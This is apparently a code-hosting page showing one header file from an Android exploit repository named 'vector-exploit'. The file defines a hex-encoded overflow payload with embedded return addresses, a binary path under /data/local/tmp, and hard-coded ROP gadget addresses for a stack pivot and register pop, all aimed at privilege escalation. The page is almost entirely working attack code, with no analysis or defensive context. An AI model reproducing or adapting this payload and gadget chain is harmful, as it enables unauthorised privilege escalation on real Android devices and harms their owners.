hackedteam/vector-exploit

View on GitHub
src/ht-android-shellcode/shared_object_eop/jni/install.h~

Summary

Maintainability
Test Coverage
char payload[] = "\x41\x53\x44\x46\x20\x58\x58\x20\xdb\x9d\xd1\xaf\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\xe0\x71\x01\x00\xc4\x19\x12\x40\xe0\x71\x01\x20\x4f\x56\x45\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\xf7\x9e\xd3\xaf\x5b\x1a\x12\x40\xbd\x87\xd1\xaf\x58\x58\x58\x58\x2f\x64\x61\x74\x61\x2f\x6c\x6f\x63\x61\x6c\x2f\x74\x6d\x70\x2f\x74\x65\x73\x74";

static char *bsh = "/data/local/tmp/test";
uint32_t final_stack_pivot = 0xafd19ddb;
uint32_t final_pop_r0 = 0xafd39ef7;